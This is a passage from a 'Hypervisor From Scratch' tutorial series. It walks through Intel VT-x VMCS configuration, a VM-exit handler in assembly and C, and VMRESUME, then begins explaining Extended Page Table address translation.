GUEST_LINEAR_ADDRESS = 0x0000640a, GUEST_CR0 = 0x00006800, GUEST_CR3 = 0x00006802, GUEST_CR4 = 0x00006804, GUEST_ES_BASE = 0x00006806, GUEST_CS_BASE = 0x00006808, GUEST_SS_BASE = 0x0000680a, GUEST_DS_BASE = 0x0000680c, GUEST_FS_BASE = 0x0000680e, GUEST_GS_BASE = 0x00006810, GUEST_LDTR_BASE = 0x00006812, GUEST_TR_BASE = 0x00006814, GUEST_GDTR_BASE = 0x00006816, GUEST_IDTR_BASE = 0x00006818, GUEST_DR7 = 0x0000681a, GUEST_RSP = 0x0000681c, GUEST_RIP = 0x0000681e, GUEST_RFLAGS = 0x00006820, GUEST_PENDING_DBG_EXCEPTIONS = 0x00006822, GUEST_SYSENTER_ESP = 0x00006824, GUEST_SYSENTER_EIP = 0x00006826, HOST_CR0 = 0x00006c00, HOST_CR3 = 0x00006c02, HOST_CR4 = 0x00006c04, HOST_FS_BASE = 0x00006c06, HOST_GS_BASE = 0x00006c08, HOST_TR_BASE = 0x00006c0a, HOST_GDTR_BASE = 0x00006c0c, HOST_IDTR_BASE = 0x00006c0e, HOST_IA32_SYSENTER_ESP = 0x00006c10, HOST_IA32_SYSENTER_EIP = 0x00006c12, HOST_RSP = 0x00006c14, HOST_RIP = 0x00006c16,};

Ok, let’s continue with our configuration.

The next step is configuring host Segment Registers.

1234567 __vmx_vmwrite(HOST_ES_SELECTOR, GetEs() & 0xF8); __vmx_vmwrite(HOST_CS_SELECTOR, GetCs() & 0xF8); __vmx_vmwrite(HOST_SS_SELECTOR, GetSs() & 0xF8); __vmx_vmwrite(HOST_DS_SELECTOR, GetDs() & 0xF8); __vmx_vmwrite(HOST_FS_SELECTOR, GetFs() & 0xF8); __vmx_vmwrite(HOST_GS_SELECTOR, GetGs() & 0xF8); __vmx_vmwrite(HOST_TR_SELECTOR, GetTr() & 0xF8);

Keep in mind, those fields that start with HOST_ are related to the state in which the hypervisor sets whenever a VM-Exit occurs and those which start with GUEST_ are related to to the state in which the hypervisor sets for guest when a VMLAUNCH executed.

The purpose of & 0xF8 is that Intel mentioned that the three less significant bits must be cleared and otherwise it leads to error when you execute VMLAUNCH with Invalid Host State error.

VMCS_LINK_POINTER should be 0xffffffffffffffff.

12 // Setting the link pointer to the required value for 4KB VMCS. __vmx_vmwrite(VMCS_LINK_POINTER, ~0ULL);

The rest of this topic, intends to perform the VMX instructions in the current state of machine, so must of the guest and host configurations should be the same. In the future parts we’ll configure them to a separate guest layout.

Let’s configure GUEST_IA32_DEBUGCTL.

The IA32_DEBUGCTL MSR provides bit field controls to enable debug trace interrupts, debug trace stores, trace messages enable, single stepping on branches, last branch record recording, and to control freezing of LBR stack.

In short : LBR is a mechanism that provides processor with some recording of registers.

We don’t use them but let’s configure them to the current machine’s MSR_IA32_DEBUGCTL and you can see that __readmsr is the intrinsic function for RDMSR.

1234  __vmx_vmwrite(GUEST_IA32_DEBUGCTL, __readmsr(MSR_IA32_DEBUGCTL) & 0xFFFFFFFF); __vmx_vmwrite(GUEST_IA32_DEBUGCTL_HIGH, __readmsr(MSR_IA32_DEBUGCTL) >> 32); 

For configuring TSC you should modify the following values, I don’t have a precise explanation about it, so let them be zeros.

Note that, values that we put Zero on them can be ignored and if you don’t modify them, it’s like you put zero on them.

123456789101112 /* Time-stamp counter offset */ __vmx_vmwrite(TSC_OFFSET, 0); __vmx_vmwrite(TSC_OFFSET_HIGH, 0);  __vmx_vmwrite(PAGE_FAULT_ERROR_CODE_MASK, 0); __vmx_vmwrite(PAGE_FAULT_ERROR_CODE_MATCH, 0);  __vmx_vmwrite(VM_EXIT_MSR_STORE_COUNT, 0); __vmx_vmwrite(VM_EXIT_MSR_LOAD_COUNT, 0);  __vmx_vmwrite(VM_ENTRY_MSR_LOAD_COUNT, 0); __vmx_vmwrite(VM_ENTRY_INTR_INFO_FIELD, 0);

This time, we’ll configure Segment Registers and other GDT for our Host (When VM-Exit occurs).

12345678910 GdtBase = Get_GDT_Base();  FillGuestSelectorData((PVOID)GdtBase, ES, GetEs()); FillGuestSelectorData((PVOID)GdtBase, CS, GetCs()); FillGuestSelectorData((PVOID)GdtBase, SS, GetSs()); FillGuestSelectorData((PVOID)GdtBase, DS, GetDs()); FillGuestSelectorData((PVOID)GdtBase, FS, GetFs()); FillGuestSelectorData((PVOID)GdtBase, GS, GetGs()); FillGuestSelectorData((PVOID)GdtBase, LDTR, GetLdtr()); FillGuestSelectorData((PVOID)GdtBase, TR, GetTr());

Get_GDT_Base is defined above, in the process of gathering information for our VMCS.

FillGuestSelectorData is responsible for setting the GUEST selector, attributes, limit, and base for VMCS. It implemented as below :

123456789101112131415161718192021void FillGuestSelectorData( __in PVOID GdtBase, __in ULONG Segreg, __in USHORT Selector){ SEGMENT_SELECTOR SegmentSelector = { 0 }; ULONG            uAccessRights;  GetSegmentDescriptor(&SegmentSelector, Selector, GdtBase); uAccessRights = ((PUCHAR)& SegmentSelector.ATTRIBUTES)[0] + (((PUCHAR)& SegmentSelector.ATTRIBUTES)[1] << 12);  if (!Selector) uAccessRights |= 0x10000;  __vmx_vmwrite(GUEST_ES_SELECTOR + Segreg * 2, Selector); __vmx_vmwrite(GUEST_ES_LIMIT + Segreg * 2, SegmentSelector.LIMIT); __vmx_vmwrite(GUEST_ES_AR_BYTES + Segreg * 2, uAccessRights); __vmx_vmwrite(GUEST_ES_BASE + Segreg * 2, SegmentSelector.BASE); }

The function body for GetSegmentDescriptor :

123456789101112131415161718192021222324252627282930313233 BOOLEAN GetSegmentDescriptor(IN PSEGMENT_SELECTOR SegmentSelector, IN USHORT Selector, IN PUCHAR GdtBase){ PSEGMENT_DESCRIPTOR SegDesc;  if (!SegmentSelector) return FALSE;  if (Selector & 0x4) { return FALSE; }  SegDesc = (PSEGMENT_DESCRIPTOR)((PUCHAR)GdtBase + (Selector & ~0x7));  SegmentSelector->SEL = Selector; SegmentSelector->BASE = SegDesc->BASE0 | SegDesc->BASE1 << 16 | SegDesc->BASE2 << 24; SegmentSelector->LIMIT = SegDesc->LIMIT0 | (SegDesc->LIMIT1ATTR1 & 0xf) << 16; SegmentSelector->ATTRIBUTES.UCHARs = SegDesc->ATTR0 | (SegDesc->LIMIT1ATTR1 & 0xf0) << 4;  if (!(SegDesc->ATTR0 & 0x10)) { // LA_ACCESSED ULONG64 tmp; // this is a TSS or callgate etc, save the base high part tmp = (*(PULONG64)((PUCHAR)SegDesc + 8)); SegmentSelector->BASE = (SegmentSelector->BASE & 0xffffffff) | (tmp << 32); }  if (SegmentSelector->ATTRIBUTES.Fields.G) { // 4096-bit granularity is enabled for this segment, scale the limit SegmentSelector->LIMIT = (SegmentSelector->LIMIT << 12) + 0xfff; }  return TRUE;}

Also, there is another MSR called IA32_KERNEL_GS_BASE that is used to set the kernel GS base. whenever you run instructions like SYSCALL and enter to the ring 0, you need to change the current GS register and that can be done using SWAPGS. This instruction copies the content of IA32_KERNEL_GS_BASE into the IA32_GS_BASE and now it’s used in the kernel when you want to re-enter user-mode, you should change the user-mode GS Base. MSR_FS_BASE on the other hand, don’t have a kernel base because it used in 32-Bit mode while you have a 64-bit (long mode) kernel.


12 __vmx_vmwrite(GUEST_INTERRUPTIBILITY_INFO, 0); __vmx_vmwrite(GUEST_ACTIVITY_STATE, 0);   //Active state

Now we reach to the most important part of our VMCS and it’s the configuration of CPU_BASED_VM_EXEC_CONTROL and SECONDARY_VM_EXEC_CONTROL.

These fields enable and disable some important features of guest, e.g you can configure VMCS to cause a VM-Exit whenever an execution of HLT instruction detected (in Guest). Please check the VM-Execution Controls parts above for a detailed description.


As you can see we set CPU_BASED_HLT_EXITING that will cause the VM-Exit on HLT and activate secondary controls using CPU_BASED_ACTIVATE_SECONDARY_CONTROLS.

In the secondary controls, we used CPU_BASED_CTL2_RDTSCP and for now comment CPU_BASED_CTL2_ENABLE_EPT because we don’t need to deal with EPT in this part. In the future parts, I describe using EPT or Extended Page Table that we configured in the 4th part.

The description of PIN_BASED_VM_EXEC_CONTROLVM_EXIT_CONTROLS and VM_ENTRY_CONTROLS is available above but for now, let zero them.

1234 __vmx_vmwrite(PIN_BASED_VM_EXEC_CONTROL, AdjustControls(0, MSR_IA32_VMX_PINBASED_CTLS)); __vmx_vmwrite(VM_EXIT_CONTROLS, AdjustControls(VM_EXIT_IA32E_MODE | VM_EXIT_ACK_INTR_ON_EXIT, MSR_IA32_VMX_EXIT_CTLS)); __vmx_vmwrite(VM_ENTRY_CONTROLS, AdjustControls(VM_ENTRY_IA32E_MODE, MSR_IA32_VMX_ENTRY_CTLS)); 

Also, the AdjustControls is defined like this:

123456789ULONG AdjustControls(IN ULONG Ctl, IN ULONG Msr){ MSR MsrValue = { 0 };  MsrValue.Content = __readmsr(Msr); Ctl &= MsrValue.High;     /* bit == 0 in high word ==> must be zero */ Ctl |= MsrValue.Low;      /* bit == 1 in low word  ==> must be one  */ return Ctl;}

Next step is setting Control Register for guest and host, we set them to the same value using intrinsic functions.

12345678910 __vmx_vmwrite(GUEST_CR0, __readcr0()); __vmx_vmwrite(GUEST_CR3, __readcr3()); __vmx_vmwrite(GUEST_CR4, __readcr4());  __vmx_vmwrite(GUEST_DR7, 0x400);  __vmx_vmwrite(HOST_CR0, __readcr0()); __vmx_vmwrite(HOST_CR3, __readcr3()); __vmx_vmwrite(HOST_CR4, __readcr4()); 

The next part is setting up IDT and GDT’s Base and Limit for our guest.

1234 __vmx_vmwrite(GUEST_GDTR_BASE, Get_GDT_Base()); __vmx_vmwrite(GUEST_IDTR_BASE, Get_IDT_Base()); __vmx_vmwrite(GUEST_GDTR_LIMIT, Get_GDT_Limit()); __vmx_vmwrite(GUEST_IDTR_LIMIT, Get_IDT_Limit());

Set the RFLAGS.

1 __vmx_vmwrite(GUEST_RFLAGS, Get_RFLAGS());

If you want to use SYSENTER in your guest then you should configure the following MSRs. It’s not important to set these values in x64 Windows because Windows doesn’t support SYSENTER in x64 versions of Windows, It uses SYSCALL instead and for 32-bit processes, first change the current execution mode to long-mode (using Heaven’s Gate technique) but in 32-bit processors these fields are mandatory.

1234567 __vmx_vmwrite(GUEST_SYSENTER_CS, __readmsr(MSR_IA32_SYSENTER_CS)); __vmx_vmwrite(GUEST_SYSENTER_EIP, __readmsr(MSR_IA32_SYSENTER_EIP)); __vmx_vmwrite(GUEST_SYSENTER_ESP, __readmsr(MSR_IA32_SYSENTER_ESP)); __vmx_vmwrite(HOST_IA32_SYSENTER_CS, __readmsr(MSR_IA32_SYSENTER_CS)); __vmx_vmwrite(HOST_IA32_SYSENTER_EIP, __readmsr(MSR_IA32_SYSENTER_EIP)); __vmx_vmwrite(HOST_IA32_SYSENTER_ESP, __readmsr(MSR_IA32_SYSENTER_ESP)); 


12345678 GetSegmentDescriptor(&SegmentSelector, GetTr(), (PUCHAR)Get_GDT_Base()); __vmx_vmwrite(HOST_TR_BASE, SegmentSelector.BASE);  __vmx_vmwrite(HOST_FS_BASE, __readmsr(MSR_FS_BASE)); __vmx_vmwrite(HOST_GS_BASE, __readmsr(MSR_GS_BASE));  __vmx_vmwrite(HOST_GDTR_BASE, Get_GDT_Base()); __vmx_vmwrite(HOST_IDTR_BASE, Get_IDT_Base());

The next important part is to set the RIP and RSP of the guest when a VMLAUNCH executes it starts with RIP you configured in this part and RIP and RSP of the host when a VM-Exit occurs. It’s pretty clear that Host RIP should point to a function that is responsible for managing VMX Events based on return code and decide to execute a VMRESUME or turn off hypervisor using VMXOFF.

123456789 // left here just for test __vmx_vmwrite(0, (ULONG64)VirtualGuestMemoryAddress);     //setup guest sp __vmx_vmwrite(GUEST_RIP, (ULONG64)VirtualGuestMemoryAddress);     //setup guest ip    __vmx_vmwrite(HOST_RSP, ((ULONG64)vmState->VMM_Stack + VMM_STACK_SIZE — 1)); __vmx_vmwrite(HOST_RIP, (ULONG64)VMExitHandler); 

HOST_RSP points to VMM_Stack that we allocated above and HOST_RIP points to VMExitHandler (an assembly written function that described below). GUEST_RIP points to VirtualGuestMemoryAddress(the global variable that we configured during EPT initialization) and GUEST_RSP to zero because we don’t put any instruction that uses stack so for a real-world example it should point to writeable different address.

Setting these fields to a Host Address will not cause a problem as long as we have a same CR3 in our guest state so all the addresses are mapped exactly the same as the host.

Done ! Our VMCS is almost ready.

Checking VMCS Layout

Unfortunatly, checking VMCS Layout is not as straight as the other parts, you have to control all the checklists described in [CHAPTER 26] VM ENTRIES from Intel’s 64 and IA-32 Architectures Software Developer’s Manual including the following sections:


The hardest part of this process is when you have no idea about the incorrect part of your VMCS layout or on the other hand when you miss something that eventually causes the failure.

This is because Intel just gives an error number without any further details about what’s exactly wrong in your VMCS Layout.

The errors shown below.

VM Errors

To solve this problem, I created a user-mode application called VmcsAuditor. As its name describes, if you have any error and don’t have any idea about solving the problem then it can be a choice.

Keep in mind that VmcsAuditor is a tool based on Bochs emulator support for VMX so all the checks come from Bochs and it’s not a 100% reliable tool that solves all the problem as we don’t know what exactly happening inside processor but it can be really useful and time saver.

The source code and executable files available on GitHub :


Further description available here.

VM-Exit Handler

When our guest software exits and give the handle back to the host, its VM-exit reasons can be defined in the following definitions.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960#define EXIT_REASON_EXCEPTION_NMI       0#define EXIT_REASON_EXTERNAL_INTERRUPT  1#define EXIT_REASON_TRIPLE_FAULT        2#define EXIT_REASON_INIT                3#define EXIT_REASON_SIPI                4#define EXIT_REASON_IO_SMI              5#define EXIT_REASON_OTHER_SMI           6#define EXIT_REASON_PENDING_VIRT_INTR   7#define EXIT_REASON_PENDING_VIRT_NMI    8#define EXIT_REASON_TASK_SWITCH         9#define EXIT_REASON_CPUID               10#define EXIT_REASON_GETSEC              11#define EXIT_REASON_HLT                 12#define EXIT_REASON_INVD                13#define EXIT_REASON_INVLPG              14#define EXIT_REASON_RDPMC               15#define EXIT_REASON_RDTSC               16#define EXIT_REASON_RSM                 17#define EXIT_REASON_VMCALL              18#define EXIT_REASON_VMCLEAR             19#define EXIT_REASON_VMLAUNCH            20#define EXIT_REASON_VMPTRLD             21#define EXIT_REASON_VMPTRST             22#define EXIT_REASON_VMREAD              23#define EXIT_REASON_VMRESUME            24#define EXIT_REASON_VMWRITE             25#define EXIT_REASON_VMXOFF              26#define EXIT_REASON_VMXON               27#define EXIT_REASON_CR_ACCESS           28#define EXIT_REASON_DR_ACCESS           29#define EXIT_REASON_IO_INSTRUCTION      30#define EXIT_REASON_MSR_READ            31#define EXIT_REASON_MSR_WRITE           32#define EXIT_REASON_INVALID_GUEST_STATE 33#define EXIT_REASON_MSR_LOADING         34#define EXIT_REASON_MWAIT_INSTRUCTION   36#define EXIT_REASON_MONITOR_TRAP_FLAG   37#define EXIT_REASON_MONITOR_INSTRUCTION 39#define EXIT_REASON_PAUSE_INSTRUCTION   40#define EXIT_REASON_MCE_DURING_VMENTRY  41#define EXIT_REASON_TPR_BELOW_THRESHOLD 43#define EXIT_REASON_APIC_ACCESS         44#define EXIT_REASON_ACCESS_GDTR_OR_IDTR 46#define EXIT_REASON_ACCESS_LDTR_OR_TR   47#define EXIT_REASON_EPT_VIOLATION       48#define EXIT_REASON_EPT_MISCONFIG       49#define EXIT_REASON_INVEPT              50#define EXIT_REASON_RDTSCP              51#define EXIT_REASON_VMX_PREEMPTION_TIMER_EXPIRED     52#define EXIT_REASON_INVVPID             53#define EXIT_REASON_WBINVD              54#define EXIT_REASON_XSETBV              55#define EXIT_REASON_APIC_WRITE          56#define EXIT_REASON_RDRAND              57#define EXIT_REASON_INVPCID             58#define EXIT_REASON_RDSEED              61#define EXIT_REASON_PML_FULL            62#define EXIT_REASON_XSAVES              63#define EXIT_REASON_XRSTORS             64#define EXIT_REASON_PCOMMIT             65

VMX Exit handler should be a pure assembly function because calling a compiled function needs some preparing and some register modification and the most important thing in VMX Handler is saving the registers state so that you can continue, other time.

I create a sample function for saving the registers and returning the state but in this function we call another C function.

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061PUBLIC VMExitHandler  EXTERN MainVMExitHandler:PROCEXTERN VM_Resumer:PROC .code _text VMExitHandler PROC     push r15    push r14    push r13    push r12    push r11    push r10    push r9    push r8            push rdi    push rsi    push rbp    push rbp ; rsp    push rbx    push rdx    push rcx    push rax    mov rcx, rsp ;GuestRegs sub rsp, 28h  ;rdtsc call MainVMExitHandler add rsp, 28h    pop rax    pop rcx    pop rdx    pop rbx    pop rbp ; rsp    pop rbp    pop rsi    pop rdi     pop r8    pop r9    pop r10    pop r11    pop r12    pop r13    pop r14    pop r15   sub rsp, 0100h ; to avoid error in future functions JMP VM_Resumer  VMExitHandler ENDP end

The main VM-Exit handler is a switch-case function that has different decisions over the VMCS VM_EXIT_REASON and EXIT_QUALIFICATION.

In this part, we’re just performing an action over EXIT_REASON_HLT and just print the result and restore the previous state.

From the following code, you can clearly see what event cause the VM-exit. Just keep in mind that some reasons only lead to VM-Exit if the VMCS’s control execution fields (described above) allows for it. For instance, the execution of HLT in guest software will cause VM-Exit if the 7th bit of the Primary Processor-Based VM-Execution Controls allows it.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293VOID MainVMExitHandler(PGUEST_REGS GuestRegs){ ULONG ExitReason = 0; __vmx_vmread(VM_EXIT_REASON, &ExitReason);   ULONG ExitQualification = 0; __vmx_vmread(EXIT_QUALIFICATION, &ExitQualification);  DbgPrint(«\nVM_EXIT_REASION 0x%x\n», ExitReason & 0xffff); DbgPrint(«\EXIT_QUALIFICATION 0x%x\n», ExitQualification);   switch (ExitReason) { // // 25.1.2  Instructions That Cause VM Exits Unconditionally // The following instructions cause VM exits when they are executed in VMX non-root operation: CPUID, GETSEC, // INVD, and XSETBV. This is also true of instructions introduced with VMX, which include: INVEPT, INVVPID, // VMCALL, VMCLEAR, VMLAUNCH, VMPTRLD, VMPTRST, VMRESUME, VMXOFF, and VMXON. //  case EXIT_REASON_VMCLEAR: case EXIT_REASON_VMPTRLD: case EXIT_REASON_VMPTRST: case EXIT_REASON_VMREAD: case EXIT_REASON_VMRESUME: case EXIT_REASON_VMWRITE: case EXIT_REASON_VMXOFF: case EXIT_REASON_VMXON: case EXIT_REASON_VMLAUNCH: { break; } case EXIT_REASON_HLT: { DbgPrint(«[*] Execution of HLT detected… \n»);  // DbgBreakPoint();  // that’s enough for now 😉 Restore_To_VMXOFF_State();  break; } case EXIT_REASON_EXCEPTION_NMI: { break; }  case EXIT_REASON_CPUID: { break; }  case EXIT_REASON_INVD: { break; }  case EXIT_REASON_VMCALL: { break; }  case EXIT_REASON_CR_ACCESS: { break; }  case EXIT_REASON_MSR_READ: { break; }  case EXIT_REASON_MSR_WRITE: { break; }  case EXIT_REASON_EPT_VIOLATION: { break; }  default: { // DbgBreakPoint(); break;  } }}

Resume to next instruction

If a VM-Exit occurs (e.g the guest executed a CPUID instruction), the guest RIP remains constant and it’s up to you to change the Guest RIP or not so if you don’t have a special function for managing this situation then you execute a VMRESUME and it’s like an infinite loop of executing CPUID and VMRESUME because you didn’t change the RIP.

In order to solve this problem you have to read a VMCS field called VM_EXIT_INSTRUCTION_LEN that stores the length of the instruction that caused the VM-Exit so you have to first, read the GUEST current RIP, second the VM_EXIT_INSTRUCTION_LEN and third add it to GUEST RIP. Now your GUEST RIP points to the next instruction and you’re good to go.

The following function is for this purpose.

12345678910111213VOID ResumeToNextInstruction(VOID){ PVOID ResumeRIP = NULL; PVOID CurrentRIP = NULL; ULONG ExitInstructionLength = 0;  __vmx_vmread(GUEST_RIP, &CurrentRIP); __vmx_vmread(VM_EXIT_INSTRUCTION_LEN, &ExitInstructionLength);  ResumeRIP = (PCHAR)CurrentRIP + ExitInstructionLength;  __vmx_vmwrite(GUEST_RIP, (ULONG64)ResumeRIP);}


VMRESUME is like VMLAUNCH but it’s used in order to resume the Guest.

  • VMLAUNCH fails if the launch state of current VMCS is not “clear”. If the instruction is successful, it sets the launch state to “launched.”
  • VMRESUME fails if the launch state of the current VMCS is not “launched.”

So it’s clear that if you executed VMLAUNCH before, then you can’t use it anymore to resume to the Guest code and in this condition VMRESUME is used.

The following code is the implementation of VMRESUME.

12345678910111213141516VOID VM_Resumer(VOID){  __vmx_vmresume();  // if VMRESUME succeed will never be here !  ULONG64 ErrorCode = 0; __vmx_vmread(VM_INSTRUCTION_ERROR, &ErrorCode); __vmx_off(); DbgPrint(«[*] VMRESUME Error : 0x%llx\n», ErrorCode);  // It’s such a bad error because we don’t where to go ! // prefer to break DbgBreakPoint();}

Let’s Test it !

Well, we have done with configuration and now its time to run our driver using OSR Driver Loader, as always, first you should disable driver signature enforcement then run your driver.

As you can see from the above picture (in launching VM area), first we set the current logical processor to 0, next we clear our VMCS status using VMCLEAR instruction then we set up our VMCS layout and finally execute a VMLAUNCH instruction.

Now, our guest code is executed and as we configured our VMCS to exit on the execution of HLT(CPU_BASED_HLT_EXITING), so it’s successfully executed and our VM-EXIT handler function called, then it calls the main VM-Exit handler and as the VMCS exit reason is 0xc (EXIT_REASON_HLT), our VM-Exit handler detects an execution of HLT in guest and now it captures the execution.

After that our machine state saving mechanism executed and we successfully turn off hypervisor using VMXOFF and return to the first caller with a successful (RAX = 1) status.

That’s it ! Wasn’t it easy ?!



In this part, we get familiar with configuring Virtual Machine Control Structure and finally run our guest code. The future parts would be an enhancement to this configuration like entering protected-mode,interrupt injectionpage modification logging, virtualizing the current machine and so on thus making sure to visit the blog more frequently for future parts and if you have any question or problem you can use the comments section below.

Thanks for reading!


[1] Vol 3C – Chapter 24 – (VIRTUAL MACHINE CONTROL STRUCTURES) (https://software.intel.com/en-us/articles/intel-sdm)

[2] Vol 3C – Chapter 26 – (VM ENTRIES) (https://software.intel.com/en-us/articles/intel-sdm)

[3] Segmentation (https://wiki.osdev.org/Segmentation)

[4] x86 memory segmentation (https://en.wikipedia.org/wiki/X86_memory_segmentation)

[5] VmcsAuditor – A Bochs-Based Hypervisor Layout Checker (https://rayanfam.com/topics/vmcsauditor-a-bochs-based-hypervisor-layout-checker/)

[6] Rohaaan/Hypervisor For Beginners (https://github.com/rohaaan/hypervisor-for-beginners)

[7] SWAPGS — Swap GS Base Register (https://www.felixcloutier.com/x86/SWAPGS.html)

[8] Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching (http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/)

Hypervisor From Scratch – Part 4: Address Translation Using Extended Page Table (EPT)

Original text by Sinaei )

Welcome to the fourth part of the “Hypervisor From Scratch”. This part is primarily about translating guest address through Extended Page Table (EPT) and its implementation. We also see how shadow tables work and other cool stuff.

First of all, make sure to read the earlier parts before reading this topic as these parts are really dependent on each other also you should have a basic understanding of paging mechanism and how page tables work. A good article is here for paging tables.

Most of this topic derived from  Chapter 28 – (VMX SUPPORT FOR ADDRESS TRANSLATION) available at Intel 64 and IA-32 architectures software developer’s manual combined volumes 3.

The full source code of this tutorial is available on GitHub :


Before starting, I should give my thanks to Petr Beneš, as this part would never be completed without his help.


Second Level Address Translation (SLAT) or nested paging, is an extended layer in the paging mechanism that is used to map hardware-based virtualization virtual addresses into the physical memory.

AMD implemented SLAT through the Rapid Virtualization Indexing (RVI) technology known as Nested Page Tables (NPT) since the introduction of its third-generation Opteron processors and microarchitecture code name BarcelonaIntel also implemented SLAT in Intel® VT-x technologiessince the introduction of microarchitecture code name Nehalem and its known as Extended Page Table (EPT) and is used in  Core i9, Core i7, Core i5, and Core i3 processors.

ARM processors also have some kind of implementation known as known as Stage-2 page-tables.

There are two methods, the first one is Shadow Page Tables and the second one is Extended Page Tables.

Software-assisted paging (Shadow Page Tables)

Shadow page tables are used by the hypervisor to keep track of the state of physical memory in which the guest thinks that it has access to physical memory but in the real world, the hardware prevents it to access hardware memory otherwise it will control the host and it is not what it intended to be.

In this case, VMM maintains shadow page tables that map guest-virtual pages directly to machine pages and any guest modifications to V->P tables synced to VMM V->M shadow page tables.

By the way, using Shadow Page Table is not recommended today as always lead to VMM traps (which result in a vast amount of VM-Exits) and losses the performance due to the TLB flush on every switch and another caveat is that there is a memory overhead due to shadow copying of guest page tables.

Hardware-assisted paging (Extended Page Table)

Nothing Special :)

To reduce the complexity of Shadow Page Tables and avoiding the excessive vm-exits and reducing the number of TLB flushes, EPT, a hardware-assisted paging strategy implemented to increase the performance.

According to a VMware evaluation paper: “EPT provides performance gains of up to 48% for MMU-intensive benchmarks and up to 600% for MMU-intensive microbenchmarks”.

EPT implemented one more page table hierarchy, to map Guest-Virtual Address to Guest-Physical address which is valid in the main memory.


  • One page table is maintained by guest OS, which is used to generate the guest-physical address.
  • The other page table is maintained by VMM, which is used to map guest physical address to host physical address.

so for each memory access operation, EPT MMU directly gets the guest physical address from the guest page table and then gets the host physical address by the VMM mapping table automatically.

Extended Page Table vs Shadow Page Table 


  • Walk any requested address
    • Appropriate to programs that have a large amount of page table miss when executing
    • Less chance to exit VM (less context switch)
  • Two-layer EPT
    • Means each access needs to walk two tables
  • Easier to develop
    • Many particular registers
    • Hardware helps guest OS to notify the VMM


  • Only walk when SPT entry miss
    • Appropriate to programs that would access only some addresses frequently
    • Every access might be intercepted by VMM (many traps)
  • One reference
    • Fast and convenient when page hit
  • Hard to develop
    • Two-layer structure
    • Complicated reverse map
    • Permission emulation

Detecting Support for EPT, NPT

If you want to see whether your system supports EPT on Intel processor or NPT on AMD processor without using assembly (CPUID), you can download coreinfo.exe from Sysinternals, then run it. The last line will show you if your processor supports EPT or NPT.

EPT Translation

EPT defines a layer of address translation that augments the translation of linear addresses.

The extended page-table mechanism (EPT) is a feature that can be used to support the virtualization of physical memory. When EPT is in use, certain addresses that would normally be treated as physical addresses (and used to access memory) are instead treated as guest-physical addresses. Guest-physical addresses are translated by traversing a set of EPT paging structures to produce physical addresses that are used to access memory.

EPT is used when the “enable EPT” VM-execution control is 1. It translates the guest-physical addresses used in VMX non-root operation and those used by VM entry for event injection.

EPT translation is exactly like regular paging translation but with some minor differences. In paging, the processor translates Virtual Address to Physical Address while in EPT translation you want to translate a Guest Virtual Address to Host Physical Address.

If you’re familiar with paging, the 3rd control register (CR3) is the base address of PML4 Table (in an x64 processor or more generally it points to root paging directory), in EPT guest is not aware of EPT Translation so it has CR3 too but this CR3 is used to convert Guest Virtual Address to Guest Physical Address, whenever you find your target Guest Physical Address, it’s EPT mechanism that treats your Guest Physical Address like a virtual address and the EPTP is the CR3

Just think about the above sentence one more time!

So your target physical address should be divided into 4 part, the first 9 bits points to EPT PML4E (note that PML4 base address is in EPTP), the second 9 bits point the EPT PDPT Entry (the base address of PDPT comes from EPT PML4E), the third 9 bits point to EPT PD Entry (the base address of PD comes from EPT PDPTE) and the last 9 bit of the guest physical address point to an entry in EPT PT table (the base address of PT comes form EPT PDE) and now the EPT PT Entry points to the host physical address of the corresponding page.

EPT Translation

You might ask, as a simple Virtual to Physical Address translation involves accessing 4 physical address, so what happens ?! 

The answer is the processor internally translates all tables physical address one by one, that’s why paging and accessing memory in a guest software is slower than regular address translation. The following picture illustrates the operations for a Guest Virtual Address to Host Physical Address.

If you want to think about x86 EPT virtualization,  assume, for example, that CR4.PAE = CR4.PSE = 0. The translation of a 32-bit linear address then operates as follows:

  • Bits 31:22 of the linear address select an entry in the guest page directory located at the guest-physical address in CR3. The guest-physical address of the guest page-directory entry (PDE) is translated through EPT to determine the guest PDE’s physical address.
  • Bits 21:12 of the linear address select an entry in the guest page table located at the guest-physical address in the guest PDE. The guest-physical address of the guest page-table entry (PTE) is translated through EPT to determine the guest PTE’s physical address.
  • Bits 11:0 of the linear address is the offset in the page frame located at the guest-physical address in the guest PTE. The guest physical address determined by this offset is translated through EPT to determine the physical address to which the original linear address translates.

Note that PAE stands for Physical Address Extension which is a memory management feature for the x86 architecture that extends the address space and PSE stands for Page Size Extension that refers to a feature of x86 processors that allows for pages larger than the traditional 4 KiB size.

In addition to translating a guest-physical address to a host physical address, EPT specifies the privileges that software is allowed when accessing the address. Attempts at disallowed accesses are called EPT violations and cause VM-exits.

Keep in mind that address never translates through EPT, when there is no access. That your guest-physical address is never used until there is access (Read or Write) to that location in memory.

Implementing Extended Page Table (EPT)

Now that we know some basics, let’s implement what we’ve learned before. Based on Intel manual we should write (VMWRITE) EPTP or Extended-Page-Table Pointer to the VMCS. The EPTP structure described below.

Extended-Page-Table Pointer

The above tables can be described using the following structure :

123456789101112// See Table 24-8. Format of Extended-Page-Table Pointertypedef union _EPTP { ULONG64 All; struct { UINT64 MemoryType : 3; // bit 2:0 (0 = Uncacheable (UC) — 6 = Write — back(WB)) UINT64 PageWalkLength : 3; // bit 5:3 (This value is 1 less than the EPT page-walk length) UINT64 DirtyAndAceessEnabled : 1; // bit 6  (Setting this control to 1 enables accessed and dirty flags for EPT) UINT64 Reserved1 : 5; // bit 11:7 UINT64 PML4Address : 36; UINT64 Reserved2 : 16; }Fields;}EPTP, *PEPTP;

Each entry in all EPT tables is 64 bit long. EPT PML4E and EPT PDPTE and EPT PD are the same but EPT PTE has some minor differences.

An EPT entry is something like this :

EPT Entries

Ok, Now we should implement tables and the first table is PML4. The following table shows the format of an EPT PML4 Entry (PML4E).


PML4E can be a structure like this :

